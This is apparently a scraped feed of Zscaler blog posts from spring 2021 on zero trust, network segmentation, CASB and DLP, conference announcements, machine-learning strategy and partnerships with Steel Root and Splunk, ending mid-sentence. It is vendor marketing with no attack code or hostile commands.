Research Blogs Feed Zscaler Blog — News and views from the leading voice in cloud security. en Distributing the Future: Enable the New Hybrid Workforce with Cloud-Native Zero Trust This post also appeared on LinkedIn. My favorite science-fiction author, William Gibson, once said, "The future is already here—it's just not evenly distributed." The same can be said for zero trust. The rapid expansion of remote work due to the pandemic has forever changed the face of enterprise cybersecurity, and the effects are still rippling across the business landscape. Even as users return to the office, we’ll still need to secure a sizable work-from-anywhere (WFA) population. This new hybrid workforce is here to stay: some people work remotely, some go into the office, and some toggle between the two as needs dictate. As a result, there is no better time than now to implement a zero trust strategy. A rebalancing act The massive move to WFA during the pandemic eroded the foundations of network-centric, castle-and-moat legacy architecture through shifting patterns and sheer volumes of traffic. To compensate, many organizations invested heavily in virtual private network (VPN) technology. As users return to the office, those same VPNs are over-provisioned, depreciating in value, and don’t support ongoing network and security transformation. VPNs lack the necessary flexibility to follow users, devices, and applications to new virtual perimeters. The net is that security costs and complexity increased, but granular visibility didn’t. Forward-looking IT teams, in turn, are seizing the opportunity to overcome the challenges of VPNs by turning to new cloud-native secure access solutions to help drive innovation both within IT and for the business. Modern cloud-native security solutions extend zero trust principles to enable and secure WFA access to applications, without requiring public exposure or complex network segmentation. Security, simplicity, and user experience go hand-in-hand in this new model, which allows for seamless access across all the permutations of the hybrid workforce. Regaining your footing with zero trust Zero trust initially envisioned context-based controls for least-privilege access for on-premise users accessing internally hosted apps. But as the pandemic demonstrated, IT teams also require a solution that offers seamless access for remote workers. By extending these tenets to the new hybrid workforce, IT teams can provide secure access to any application or asset without publicly exposing the application, asset, or even the infrastructure that supports access. A zero trust architecture provides security, granularity, and visibility no matter where users, applications, or assets live. At Zscaler, our cloud-delivered zero trust solution, Zscaler Private Access (ZPA), allows IT teams to deliver a consistent, frictionless user experience for employees, third parties, and B2B communication. Access is seamless regardless of whether the user is "off-network" or "on-network"—the network doesn't matter anymore. The policy environment is simplified, becoming user- and app-centric rather than network-centric, and consistent across cloud and data center application environments. Granular policies for context-based access ensure least-privileged connections, combining user and device attributes to permit access only by authorized users on compliant devices. Since zero trust connects users to specific applications rather than allowing endpoints access to the entire network, yesterday’s "virtual private network" evolves into today's secure access service edge (SASE). Public service edges provide transport to remote applications, while private service edges support local and on-premises access. Moreover, by incorporating industry-leading endpoint detection and response (EDR) solutions from CrowdStrike, Carbon Black, Sentinel One, and others, IT can detect and stop dirty devices. Browser isolation enables BYOD and unmanaged devices to access applications without the data ever touching the device. API-driven integration with security orchestration, automation, and response (SOAR) solutions frees up expensive human attention to focus on more critical security considerations and priorities. The capabilities above work together to greatly reduce dependency on network perimeter security, increase visibility, and minimize cost and complexity. Furthermore, while ZPA connects users to an enterprise's internal applications, Zscaler Internet Access (ZIA) connects users to internet and SaaS applications on the internet. Backhauling everyone’s traffic to a few internet egress points just to send it through a stack of security appliances no longer makes sense: WFA users can leverage the same Zscaler Zero Trust Exchange and access public resources via direct internet connections protected by ZIA. Application of the fundamental zero trust principles of context-based, least-privileged access beyond their initial narrow scope of on-premises users connecting to internally hosted applications is on the rise. Protection of outbound as well as inbound traffic, identity-based access controls for machine-to-machine as well as user-to-machine traffic, and integration of additional context all combine to offer more granular and adaptive access decisions. But nobody does this overnight. Solutions need to work seamlessly across hybrid use cases to protect both legacy resources and infrastructures as well as modernized workflows. The path forward The past year rapidly accelerated existing cloud migration and remote work trends. Traditional security models struggled to accommodate the huge change in traffic flows when the global digital workforce went home en masse. Companies that had already embraced digital transformation absorbed the change and adapted more easily. In the space of a couple of months, we helped many companies use zero trust to transition their entire workforce to WFA. Now we have the luxury of thinking and planning more strategically for how to best support the evolving hybrid workforce post-pandemic. A continuing theme in 2021 will be the importance of flexible, resilient solutions that adapt to ongoing change. It’s time to seize the zero trust moment! Modern cloud-delivered zero trust architectures apply security functions consistently across an ever-evolving landscape, and will remain a critical component to accommodating and securing the new hybrid workforce. Wed, 05 May 2021 08:00:02 -0700 Lisa Lorenzin Join Zscaler at the ONUG Spring 2021 Virtual Conference Zscaler has been pleased to sponsor ONUG conferences in years past, and 2021 is no exception. This week’s ONUG Spring 2021 Virtual Conference promises to cover the key challenges we all faced and the lessons we learned during the past tumultuous year. In ONUG’s words, “We will digest the changes we experienced together and discuss the technologies and strategies critical to our digital transformation business models in 2021 and beyond.” At Zscaler, we’ve been working closely with customers on those very matters. A year ago, it was all hands on deck, with teams working around the clock to help companies get their employees working securely from home. It quickly became obvious that the organizations that had begun to transform their network and security infrastructures were far more prepared for the challenges of 2020. Having reduced or eliminated their reliance on legacy technologies that can’t scale, such as VPNs and network firewalls, they could pivot quickly to a fully remote workforce securely accessing apps in multiple clouds and data centers. So where do we go from here? The last year has shown us that digital transformation is a business imperative. It’s enabling new business models and creating digital links between employees, customers, suppliers, and partners that improve collaboration and speed. In today’s world, your employees are on the internet now more than they are on the corporate network, and your applications are more likely to be in the cloud in the form of SaaS, such as Microsoft 365, and through the migration of private apps to AWS, Azure, and Google Cloud Platform. This transformation, in which business increasingly takes place over the internet, results in a dramatically expanded attack surface. Security must be embedded into every connection, no matter where it takes place or whether it’s initiated by a person, application, IoT device, or system. It must be delivered in the cloud, closer to where the majority of users and business assets are now centered. And it must be built on zero trust to reduce business risk. Zscaler has developed a comprehensive platform of services that enable secure transformation. It’s called the Zero Trust Exchange, and it’s helping IT leaders embrace cloud-delivered zero trust, while delivering fast, seamless, and secure access across their entire business ecosystem. You can hear a lot more about it at the ONUG Spring 2021 Virtual Conference, May 5-6, 2021. We look forward to sharing with the ONUG Community and Conference attendees how Zscaler helps organizations move away from legacy security technologies that were not built for today’s workforce and enables secure and efficient work-from-anywhere experiences built on zero trust. Please join us at these ONUG sessions. Zscaler Keynote Address: May 6 at 2:55 PM ET Accelerate your digital transformation with zero trust. The cloud and mobility are powerful enablers of digital transformation, but many IT organizations are grappling with legacy architectures and processes that haven’t evolved much in decades. When applications lived in the data center and users were connected to the network, it made sense to invest in a hub-and-spoke architecture and protect it with a castle-and-moat security perimeter. But today, a new approach to security is needed, one built from the ground up with zero trust to securely enable businesses to take full advantage of the agility, efficiency, and resiliency of the cloud. In this session, Zscaler CEO Jay Chaudhry talks with Gregory Simpson, Former CTO and AI Leader for Synchrony Financial, about his experiences leading his organization into today’s cloud-first world. Zscaler Proof of Concept: May 5 at 1:10 PM ET This Proof of Concept is also being shown in the Zscaler Virtual booth over the course of the two-day virtual event. Zscaler Open Session: May 6, at 2:20-2:50 PM ET Enabling Enterprise Digital Transformation – Illustrated You’ve probably been hearing a lot about digital business transformation, but has anyone talked to you about what it means for your organization? Why does it matter? What does it entail, and how do you start? In this video whiteboarding session, you’ll have the chance to hear from Zscaler's Solution Architect, Brian Deitch, about the drivers of digital transformation, get answers to your questions, and learn how to take the first steps—or the next steps—on your journey. The session will cover a range of topics, including zero trust, the changing branch architecture, IT simplification and cost reduction, the need to support work-from-anywhere, and the benefits of cloud-native security that supports secure, any-to-any connectivity. We look forward to seeing you at the event. Be sure to register today using Zscaler’s exclusive free passcode. Tue, 04 May 2021 07:00:01 -0700 Sabrina Alves Network Segmentation: Issues and Opportunities to Look Beyond Data centers today are sprawling, highly complex, interconnected behemoths. In a large enterprise, managing just one on-premises data center could prove challenging, but the reality is that most organizations have to contend with multiple data centers spanning on-premises, virtual, and cloud. Wherever the applications live, the fact remains that organizations must implement segmentation to manage security, compliance, performance, and more. To address these challenges, many organizations use a combination of technologies, such as Virtual Local Area Networks (VLANs), Virtual Routing and Forwarding (VRFs), Physical or Virtual Firewalls, and native cloud and container security products. However, using these technologies to segment an organization's applications is a significant operational task and can negatively affect cost and complexity—issues made worse if adequate security controls do not accompany each segment. The divider and the protector Using VLANs and VRFs to organize and cordon off parts of the network comes with some significant benefits. For one thing, networking teams can achieve logical separation of the network without investing in new hardware (if the data center is on-premises) or spinning up new hosts. With fewer hosts per subnet to manage, network performance and monitoring improve. Plus, a VLAN is an opportunistic place to attach network- or host-based firewalls. Doing so means network and security teams can control what traffic flows in, out, and between zones on the network, protecting against compromise and meeting compliance and audit mandates. The one-two punch of a VLAN with a firewall provides demonstrable attention to data segregation and gives organizations a better chance of limiting the blast radius when a network compromise occurs. For instance, a corporation's guest traffic should rarely have reason to access the finance department's data, nor should HIPAA data be accessible by marketing applications. Network segmentation creates the mandatory boundaries between collections of sensitive network data/applications/traffic, and attaching a firewall protects data/apps/traffic from extra-segment threats. For years, organizations have been using VLANs and overlaying firewalls to organize and secure networks. It's still a reliable approach to controlling north-south (inside vs. outside) traffic flow. Nonetheless, the VLAN+firewall method includes significant drawbacks that have resulted in organizations abandoning major network segmentation or microsegmentation projects or merely leaving an "any-to-any" policy set due to the complexity of maintaining rules in a dynamic environment. Lack of segmentation and overly permissive controls, in turn, have facilitated some of the noisiest network compromises to date. Such attacks could have been prevented from propagating if properly secured network segmentation had been in place. A segmentation project requires organizations to know and understand all of their networks' assets. Next, they have to determine what boundaries or zones make sense based on business and compliance needs. They have to begin the actual work of implementing the enforcement points, which may require upgrades to existing virtualization or infrastructure components that add considerable risk in a brownfield environment. Some organizations will use greenfield environments to begin their segmentation journey, utilizing new toolsets in SDN, cloud, and or container platforms. These environments quickly become problematic as they scale or migrate to multi-vendor or multi-cloud solutions. Other considerations such as multiple availability zones, stretch layer 2, and auto-scaling is standard practice, so the security solution will need to address these environments as well. The potential for misconfiguring a security policy during implementation is high due to today's network architectures' complexity. The margin for error becomes more significant in an environment where the organization does not control the network infrastructure, such as hybrid cloud or virtual. Complexity increases further when cascading firewalls become the method of enforcement. Additional firewalls mean additional cost and configuration with multiple levels of complexity. Imagine if you had one thousand servers and each server talked to five different devices. That is potentially 5000 firewall policies. It becomes unmanageable. Gartner, in a report on network security policy, wrote: "Through 2023, 99% of firewall breaches will be caused by firewall misconfigurations, not firewall flaws." Unfortunately, configurations aren't the only problem organizations encounter when trying to segment with network-based segmentation. These controls traditionally use address-based identity groups to facilitate communication between hosts, servers, or applications. In modern application environments, though (primarily virtual, container, and cloud networks), this type of segmentation is not granular enough to provide the level of security organizations are requiring. Additionally, the possibility of high jacking or piggybacking on these communications (e.g., address resolution protocol attacks, MAC attacks) could result in lateral threat movement and malicious activity on traffic that is already inside a segment. Unbundling the operational nightmare From a governance perspective, setting up and managing network-based security in a hybrid cloud data center is an operational nightmare. Frequent user or address changes and critical business applications scale vertically or horizontally on the network (seemingly) at the speed of light. All of this equates to ongoing manual policy definition, review, change, and exception handling. Furthermore, the aforementioned business-critical applications cannot withstand the downtime associated with changing segments and adding permissions. And if there is one thing network admins can be sure of, both the network and the applications that communicate on it will change. Even with automation, the amount of work required to implement segmentation and manage firewall rules is enormous—and a primary contributing factor to slowed or stalling segmentation projects. Here at Zscaler, we're firm believers in segmentation. What we can't get behind, however, is the complexity and operational overhead attached to creating segments based on the ephemeral network information associated with cloud and virtual networking. Our technology allows organizations to achieve application segmentation based on the cryptographic identity of applications and services communicating rather than network infrastructure. Using application identity as the control point for decision-making means that the environment can change (as networks often do) while the protection remains. Further, Zscaler decreases the implementation and management burden of network segmentation/microsegmentation with machine-learned policies that can be automatically applied and automatically adapt even when network constructs change. No more manual rule creation, tuning, or exception handling, yet the same level of assurance that the organization will meet security, compliance, and audit requirements. Tue, 04 May 2021 08:00:02 -0700 Frank Dagenhardt Think CASB Will Solve All Your Problems? Think Again. What’s new in the world of Data Protection? For a closer look at how cloud apps are increasing data risk and what role CASB can play in your data protection strategy, be sure to check out our new Data Protection Dialogues episode on How to select the right CASB. Like most progressive companies, you've probably got CASB on your shopping list. Cloud applications have changed everything. Your sensitive data has left yesterday's on-prem networks and is now distributed everywhere, with your users accessing this sensitive information from anywhere with unmanaged devices. You need more control over your data than ever before; however, legacy, network-centric security tools offer little to none. So, CASB seems like a natural next step, right? Think again. While CASB seems to restore the control your organization needs, your security posture is only as strong as the comprehensive security strategy you put in place around the tools and technologies you purchase. That said, let's explore how you can build a best-of-breed CASB strategy. Why is CASB so hot? Cloud applications have transformed everything and, chances are, your organization could be using too many to count across all areas of your business. While the agility of the cloud is undoubtedly game-changing, these applications rely on your company’s most prized possession–data–to operate. This brings increased risk to your business as moving data outside of your network means it’s easily accessible for both authorized users and attackers alike without the right security precautions in place to restore control. API CASB, also known as out-of-band CASB, can govern data-at-rest in these applications, prevent dangerous file sharing and even oversharing. Considering that in the old data center world, you may not have had great control over who could access and share your app data, CASB seems like a giant leap. While this is true, we must remember that CASB is just part of a larger, more holistic data protection strategy for today’s cloud-first world. The convergence of CASB, SWG, and DLP Essentially, cloud applications are just a destination that users connect to, which means that controlling user-to-destination connections leads most enterprises to consider a secure web gateway (SWG) solution. Designed to control what users can and cannot access, the security industry is quickly realizing that there’s a natural overlap between SWG and CASB data protection, not to mention the need for a DLP to glue everything together. So what does this look like? When you think about it holistically it becomes a bit more clear. Start with inline SWG/CASB to control what locations and cloud apps your users can and cannot connect to based on risk. With that setup, you’ve got the right plumbing for your data flows. But should the data even leave the premises? Add DLP to the mix to quickly find and control sensitive data in motion. Lastly, dial in API CASB for your data that made it up to your cloud apps’ destinations to make sure any data that made it up to your cloud apps gets secured from accidental sharing or data loss. Since you already have DLP, you can even bring your same sensitive data controls up to your API CASB, which makes life much simpler. Do you have the right CASB mindset? Now that we can see the big picture, what should be the right approach when formulating a foolproof CASB strategy? Architecture A comprehensive CASB strategy starts with a unified, cloud-delivered zero trust platform that handles your business-critical traffic inline instead of relying on API CASB and hard-to-manage, hard-to-scale, point products. Moreover, this platform must be powerful enough to inspect SSL traffic across all ports for hidden threats to your data. Lastly, from an architectural standpoint, your zero trust platform should be fully integrated, meaning it can handle other security needs beyond data protection. This includes securing local breakouts, identifying and remediating advance threats via AI and ML sandboxing. Finding a platform that does all of this will minimize operational complexity. Integrated DLP Next, once you have the right architecture, it’s all about centralizing unified, best in class DLP engine. Unfortunately, many companies who don’t do this end up with multiple DLP policies spread over network appliances, endpoints, and point-product CASB, causing many unwanted complexities and administrative challenges. On the other hand, centralizing on one DLP policy makes protecting your sensitive data incredibly easier, as it allows you to create a single DLP policy that is applied to all areas of your business, including branch offices, mobile users, and SaaS apps, to secure data-at-rest. Real-time data protection Although out-of-band CASB is easy to implement and satisfies the need to control data-at-rest, security teams will often move on to other projects without putting the proper tools in place to improve real-time visibility and inspection. A complete Data Protection platform built for both inline and API inspection provides a granular look at data-at-rest and data-in-motion to help you and your team make better data protection decisions and quickly identify unauthorized uses of shadow IT. Essentially, think of inline data protection as the first building block to set up the proper paths to the apps your data should go to vs. the ones it shouldn’t. Governing data-at-rest Now, with the right solution in place to control what data should leave your network and what sanctioned apps need to be secured, you’re ready to start thinking about out-of-band CASB to protect your data at rest. Here’s where things get easy. Remember those policies you set up when deploying your integrated DLP? Those inline policies are ready to be applied to your data-at-rest. Overlay those policies on your SaaS data, and you’ll be able to find the sensitive data you need governance over, allowing you to quickly identify who can access and share this data. For example, you can make sure this sensitive information isn’t dangerously shared via open internet links or overshared to unauthorized groups. It’s tremendously empowering to have this level of control, which is something—until now—didn’t really exist in the traditional, data center application world. Best of all, when you have the right security cloud platform, you can start scanning these SaaS apps for the arrival of dangerous malware and Sandboxing and AI/ML to quickly identify lurking files that shouldn’t be co-mingling with your precious sensitive data. Maintaining security posture Now that you have total control over your sensitive data-at-rest and in-motion, it’s time to think about your applications themselves and whether or not they are vulnerable to attacks via a misconfiguration during deployment. Considering that most of the world’s most significant breaches are brought about due to simple cloud misconfiguration, ensuring your applications are in good standing is an essential box to check. By implementing Cloud Security Posture Management and SaaS Security Posture Management, you can easily find these dangerous gaps and quickly remediate them. Therefore, when building out your CASB and DLP strategies, look for a solution with built-in compliance frameworks and the ability to continuously scan for public and SaaS app misconfigurations. Again, while considering your CASB DLP strategy, look for a solution that incorporates Browser Isolation for added, necessary security. Controlling unmanaged BYOD If anything over the last year taught us, it’s that work-from-anywhere is here to stay—in some form—for the unforeseeable future. While this flexibility is terrific for businesses and employees, it does yield some security challenges, such as enabling third-party access to sensitive data without incurring additional risk and securely providing unauthorized BYOD devices access to your data for these third-parties to do their jobs. Traditionally, these challenges are typically solved with reverse proxies, however, doing this is incredibly complex and often fraught with usability issues resulting in poor user experiences. Another more straightforward approach to solving the above is Browser Isolation. Browser Isolation streams data to third-party devices in the form of pixels. By streaming data as pixels, BYOD devices can't download, copy/paste, or print the data they're viewing. It's fully interactive within the browser, but nothing persists on the BYOD device, significantly lowering risk. Rethinking it all Sure, simple CASB does offer more control over your data than legacy, network-centric approaches. That said, CASB is only one aspect of a comprehensive security strategy that considers user and device access, visibility, remediation, compliance, and decreased risk. For a more in-depth look into what it takes to build a comprehensive data protection strategy, be sure to check out our new video series, Data Protection Dialogues. Thu, 29 Apr 2021 12:25:42 -0700 Steve Grossenbacher Insight from the Front Lines: Zscaler ThreatLabZ to Give Keynote at Zenith Live We’re excited to announce that Zscaler ThreatLabZ will be a part of our keynote lineup at this year’s Zenith Live on June 15 and 16. Backed by the world’s largest security cloud, Zscaler ThreatLabZ is our internal research team dedicated to uncovering and investigating emerging threats, while educating the cybersecurity world about how to protect against them. A global team of security experts, researchers, networking experts, and computer scientists, ThreatLabZ is responsible for analyzing and eliminating threats across the Zscaler security cloud, as well as keeping a finger on the pulse of the world’s threat landscape—with the intent of making the internet safer for all. What you can expect from ThreatLabZ at Zenith Live Our renowned ThreatLabZ experts will present in-depth research into emerging threats discovered with the Zscaler cloud, which processes nearly 2 million transactions per second. During the keynote, Deepen Desai, CISO and VP of Security Research and Operations at Zscaler, will dissect recent attack chains, including what types of attacks are trending, why these attacks are becoming more prominent, and what you can do to protect your organization from them. This presentation includes a close look at threats targeting supply chains, Microsoft exchange servers, ransomware, and more. You’ll also get an exclusive preview into Zscaler’s disruptive protection suite that unifies our industry-leading threat intelligence, world-class experts, and innovative technology to give you peace of mind from the most advanced attackers. Check out these ThreatLabZ resources prior to Zenith Live Because Zscaler security is cloud-delivered, we have the unique ability to analyze every byte of traffic routed to our cloud before it’s sent back to the user. This ability to handle massive amounts of traffic without latency enables us to automatically and accurately track attack trends by threat type, location, threat actor type, among other criteria. Because of this, ThreatLabZ has put together a series of dashboards that can be found publicly on our site. These dashboards provide a real-time view into the number of transactions processed by the Zscaler Cloud, policies enforced, and threats blocked. At any moment, hundreds of thousands of concurrent events are being managed by Zscaler cloud security, with billions of activities collected and processed daily. Let’s take a closer look at some of the aspects that comprise the global threat landscape we are tracking. Cloud Activity Dashboard This dashboard shows how hard our security cloud is working – processing more than 50 billion transactions daily, including applying almost 3 billion policies across all customers, and blocking more than 70 million threats per day. Global Threat Map Dashboard This interactive map illustrates the threats that Zscaler has blocked during the past 24 hours using antivirus, advanced threat protection, and sandbox technology. Global Internet Threat Insights A graphical representation that displays the movement of global threats, showing countries of origin, target destinations, and threat types. Cloud Application Dashboard An interactive view of cloud application trends on the Zscaler platform. Data can be filtered by application, date range, and industry verticals. Encrypted Traffic Dashboard This dashboard shows the volume of encrypted traffic as a percentage of total traffic moving across the cloud. Global Enforcement Dashboard A depiction of the hourly transactions, threats blocked, and policies enforced worldwide in the Zscaler cloud. Internet of Things Dashboard How much traffic is generated by things? More than you think. Work From Anywhere Trends Dashboard The latest dashboard from ThreatLabZ shows how enterprise traffic has changed since the beginning of the pandemic. ThreatLabZ also publishes research reports, blogs, and papers about their findings and how organizations can adapt to the ever-evolving threat landscape. What to expect at Zenith Live 21 Zenith Live is a virtual conference focused on secure digital transformation, showcasing what’s possible with the flexibility of true zero trust. With more than fifty breakout sessions across six tracks, hands-on training, executive forums, and architecture workshops, Zenith Live is designed to show IT leaders across all disciplines how to lead an organization securely into the modern era, where you can innovate faster, reduce risk, and work smarter—all at the speed of cloud. Here’s what else you can expect at this year’s event: Expert Speakers Hear visionary predictions for the future of the digital world and how CIO, CTO, and CISO pioneers from Fortune 500 companies successfully enacted their secure digital transformation initiatives. In-Depth Breakout Sessions Select from more than 50 sessions in six tracks: Foundations Zscaler Expert CloudOps/DevSecOps Network Professional Security Professional Public Sector Architecture Workshops Zscaler experts teach an interactive session on how a zero trust architecture can free you from past constraints so you can move securely to the digital future—at cloud speed. Women in IT Exchange Tune into a fireside chat with IT leaders on professional direction and practical approaches to breaking down the barriers to individual success. Live Q&A/Demos Zscaler professionals will lead hands-on interactive training sessions on Zscaler’s Zero Trust Exchange Technology. Training Zscaler cloud operations and cybersecurity experts will lead detailed hands-on technical training and certification programs. Register now for this one-of-a-kind, two-day immersive experience. Wed, 28 Apr 2021 09:00:01 -0700 ThreatLabz How and When to Embed Machine Learning in Your Product To help companies think about how to build ML into their product infrastructures at scale, Capital G held a Q&A session with Howie Xu. It was originally published March 15, 2021, on Medium. Machine learning can enable a company to make sense of mass quantities of data, separate noise from signal on an immense level and unleash a product’s ability to truly scale. Many CapitalG companies have embedded ML into their products with great success (and in fact this is an area where CapitalG often provides hands-on support and training), but getting there is no easy feat. Embedding ML is among the most complex tasks that product teams can attempt. To help companies think about how to build ML into their product infrastructures at scale, we decided to sit down with Howie Xu, VP of Machine Learning & AI at leading cybersecurity company Zscaler (NASDAQ: ZS). A CapitalG portfolio company since 2015, Zscaler is now a large, publicly-traded global firm with more than 2,000 employees worldwide. In this Q&A, Howie discusses the value that machine learning can provide, when to use ML (and, maybe more importantly, when not to) and how to organize teams for ML success. Johan: Howie, before we dive in, can you describe what Zscaler does and your role as VP of Machine Learning and AI? Howie: Sure! Zscaler enables secure digital transformation by rethinking traditional network security and replacing on-premises security appliances to empower enterprises to work securely from anywhere. You can think of us as the “Salesforce of security.” Zscaler is the world’s largest inline security cloud company, securing more than 150 billion transactions per day, protecting thousands of customers from cyberattacks and data loss. My role is to drive the technology, as well as awareness and use cases for AI-based product delivery at Zscaler. A lot of what’s involved in my role actually involves close collaboration with other internal teams, like the rollout of the world’s first AI-powered cloud sandboxing engine. Johan: What advice would you give a founder, CTO or product leader who has achieved product-market-fit and is looking to embed ML in their product to help it scale? Howie: My best piece of advice is to realize that AI is merely a means to an end. I think of it as a giant hammer — it can accomplish huge tasks, but it’s overkill in many scenarios. For successful implementations, seek out the 10X opportunities. Anything below that threshold, like a 20–30% increase in speed or efficiency, and such delta simply isn’t worth the effort required. In those cases, it makes more sense to use conventional technology. I’ve found that the greatest challenges to ML success often amount to challenges in alignment rather than technology. So much of what leads to a successful ML implementation comes down to successful stakeholder alignment and education. This may sound trivial, but it’s absolutely not. Getting AI empathy and literacy to technical and non-technical teams and jumping from what computer scientists have done for the last 20 to 30 years to what the AI team truly needs is not linear and definitely not easy. You have to put the time into education and alignment, or the teams aren’t going to collaborate with you closely enough, and you won’t be able to get the domain knowledge or the data you need to make the algorithms work well. Johan: You have both founder & scale-up perspective, having founded an AI/ML startup and now overseeing the embedding of AI & ML at Zscaler. What’s different about doing this at scale at a large, established company like Zscaler with 150B transactions and 100M threats detected per day? Howie: At Zscaler, my greatest opportunity is having an infinite amount of data; likewise, my greatest challenge is having an infinite amount of data. But, it is a fantastic problem to have. Most AI startups struggle to find sufficient data. In fact, a lot of security companies claim to use ML before they’re actually able to because they just don’t have enough data yet. We, on the other hand, have a trove of it. But it is challenging for us to process all of it. For starters, that’s just too much data for even the most powerful computers and largest teams to analyze. On top of that, issues like user privacy and security are of paramount importance and must be carefully factored into the equation. And of course, on top of all of that, we have to balance speed and cost in every implementation. Being able to process 99.99% of data would have no value if it took too long to achieve it. The challenge for companies at scale is to architect ML to be both “massive scale data proof” and “existing product compatible.” We have to figure out which data to analyze, and we constantly face a spectrum of tradeoffs that necessarily come with having access to data on such a massive scale. Johan: AI & ML can seem like buzz words that are promoted as almost panaceas to all business problems, which is obviously unrealistic. In what kinds of scenarios and applications is AI & ML most promising? Howie: It may sound simple, but within cybersecurity, AL & ML are most promising in use cases requiring both speed and accuracy. These are the scenarios in which conventional technology simply can’t scale to meet the needs. On the flip side, it’s important to understand that ML may generate non-trivial amount of false positives. However, if you leverage the technology right, the false positive is not a stopper. For example, let’s say that I can use AI to detect 95% or even 99% of logs, alerts, or files are not threats. We’re still going to investigate what’s left, and typically what’s left will be the most serious threats requiring closer investigation. Creating filters with AI allows teams to spend the time necessary to assess the more critical risks. Johan: In your experience, what is the best way to organize the product and engineering teams to embed ML into an existing product? Howie: There is no correct or incorrect way. What’s right will vary by company, but at Zscaler we organize ML as an independent functional team reporting directly to the president of the company. This structure helps us in a number of ways: With hiring and retention because it provides the opportunity for top data science PhDs to work with each other. The opportunity to collaborate with high-caliber peers is often extremely important in the recruiting and retention of these highly sought after specialists. Providing broad coverage across the company, as well as insight into the organization’s potential use cases for AI implementations. Enforcing best practices, given our broad company-wide mandate. The challenge with this structure is that it leads to more time needing to be spent communicating and collaborating with other functional organizations. I believe that’s a worthwhile tradeoff and have found this to be a highly successful organizational structure. Johan: Zscaler participated in ML@CapitalG, our program in which Googlers train engineers & product teams at our portfolio companies on machine learning. You had many of your team members participate in the program — how important is it to train not just engineers but the teams around them, such as product managers or UX/UI designers? Howie: My machine learning engineers loved the training of Google’s AI cooking recipes. But it is more than that. I’ll give you a specific example to show the importance. Amir Levy, one of our product managers who attended the training, sought me out on the session’s last day. He came back to the office and grabbed me to brainstorm a use case he thought about during the training. Within a few short months, the output of that decision was already significantly improving our company’s bottom line. Johan: What tools or resources do you recommend to startups and more established companies implementing AI & ML implementations? Howie: We don’t use all of them but some tools and resources for consideration: autoML, H2O AI, DataRobot, and Google Cloud Platform for exploring use cases More than anything, though, I highly recommend seeking out the advice of peers who can discuss what worked and what failed terribly and why. Many of the biggest AI failures I know have not been on the technology side; they’ve been due to a lack of alignment between business and technical priorities. I’ve been incredibly fortunate to benefit from the knowledge and support of my company’s CEO Jay Chaudhry and President Amit Sinha, as well as my peers in the company and in the industry. Johan: What accomplishments of your team’s are you most proud of this past year and why? Howie: Protecting our customers by processing over 150 billion transactions and blocking 100 million threats per day is not a joke. Helping Zscaler to do this is our biggest accomplishment. There are a lot things happening along the way of course, including the the world’s first AI-powered cloud sandboxing engine with a successful integration with the TrustPath technology after the acquisition, all the unknown threats we helped to discover via AI/ML, the anomaly detection functionality we showcased at Zenith Live in December, and some very interesting AIOps progress we made recently. Tue, 27 Apr 2021 09:00:01 -0700 Howie Xu Partnership with Steel Root to Support CMMC Requirements for Defense Contractors In an effort to strengthen federal supply chain security, it will be necessary for more than 300,000 defense contractors to meet Cybersecurity Maturity Model Certification (CMMC) requirements over the next five years, demonstrating they can protect Controlled Unclassified Information (CUI). While CMMC launched prior to the SolarWinds attack, the massive breach underscores the hard requirement to improve and normalize cyber requirements for the organizations that support federal missions. Not only will CMMC be required on all new DoD contracts, but the DoD will also leverage third-party assessments and certifications to ensure these requirements are being met. This contrasts with the status quo, in which contractors are expected to protect CUI on their own accord, meeting their own internal compliance standards. Steel Root, a leading cybersecurity services firm specializing in compliance for the U.S. Defense Industrial Base, and Zscaler recently announced a partnership to help defense contractors prepare for CMMC certification. Commenting on this partnership, Steel Root Managing Partner Mike Nestor says, “Zscaler is a disruptive force in cloud-based security and has been validated year over year as the only leader in Gartner’s Magic Quadrant for Secure Web Gateways.” He continued, “When the FedRAMP authorization for Zscaler Internet Access was announced in 2020, we immediately recognized the solution as a required component in the cloud-native systems we design and implement. It’s the only zero trust secure access solution in the market that can meet our clients’ compliance requirements.” As the only SASE solution provider to meet the defense industry's most stringent security requirements (FIPS 140-2, validated cryptography, and FedRAMP authorization for cloud services), Zscaler is focused on bringing the most secure cloud-based security services to DoD organizations and the larger defense industrial base community. Steel Root understands the importance of a cloud-first, future-ready strategy, and provides highly effective guidance and implementation services supporting defense contractors as they prepare for CMMC—which is why our partnership with Steel Root furthers our commitment to helping federal organizations improve their cybersecurity posture. As DoD contractors proactively consider how their organizations can achieve the highest level of cloud accreditation through CMMC, they should look to leverage cloud security platforms that have already achieved FedRAMP-High authorization, such as Zscaler’s FedRAMP-High Zero Trust Exchange. Together, Zscaler and Steel Root provide both guidance and implementation services for defense contractors as they prepare for CMMC. As, a result, contractors can focus on supporting DoD missions—and together, the defense community can take steps forward to mature cyber defenses. Mon, 26 Apr 2021 08:00:01 -0700 Drew Schnabel Achieve True Zero Trust with Zscaler and Splunk Zscaler is proud to announce our zero trust partnership with Splunk, giving security analysts more ways to incorporate telemetry from our world-class Zero Trust Exchange into their workflows and strategies. Together, our tightly integrated, best-of-breed cloud security and security analytics platforms deliver unmatched zero trust capabilities for the modern, cloud-first enterprise. Zero trust is based on the notion that a breach is inevitable or has likely already occurred, and therefore any and all access to resources should be limited to the least amount possible for users to be able to do their jobs. This involves segmentation, risk-based access controls, continuous authentication and monitoring, and dynamic coordination between security controls. Citing guidance from the National Security Agency (NSA), “to be fully effective to minimize risk and enable robust and timely responses, zero trust principles and concepts must permeate most aspects of the network and its operations ecosystem.” Zscaler and Splunk work together to do just that. Zscaler’s cloud-native proxy architecture eliminates unnecessary exposure and provides rich data and increased visibility for the SecOps team. With a direct-to-cloud architecture, security teams can ensure that policy is being applied across every transaction; meanwhile, they get boosted insight into users, data, and apps. The zero trust benefits of Zscaler include: Zero attack surface – apps are never exposed to the internet; you can’t attack what you can’t see Direct connections to an app, not a network – segment of one, no exposure of any additional resources or data, no ability to move laterally or connect to C&C servers Proxy architecture, not pass-through – full content inspection including SSL; holds and inspects unknown files before reaching the endpoint Multi-tenant architecture – cloud-native, multi-tenant design; continuous security updates Secure Access Service Edge (SASE) – policy enforced at the edge in 150 DCs (SASE), peering in internet exchanges, hundreds of apps Splunk, meanwhile, provides SecOps teams with centralized log ingestion and analytics to monitor and correlate activities across the entire security environment – including a direct cloud-to-cloud streaming ingestion of Zscaler logs and dashboards – and provides visibility into zero trust with a zero trust analytics dashboard. Further, Splunk Phantom can orchestrate policy, whitelisting/blacklisting, and remediation actions using Zscaler’s API. Splunk delivers: Logging, normalization, correlation, and enrichment of data from your entire security infrastructure in Splunk including a direct cloud-to-cloud 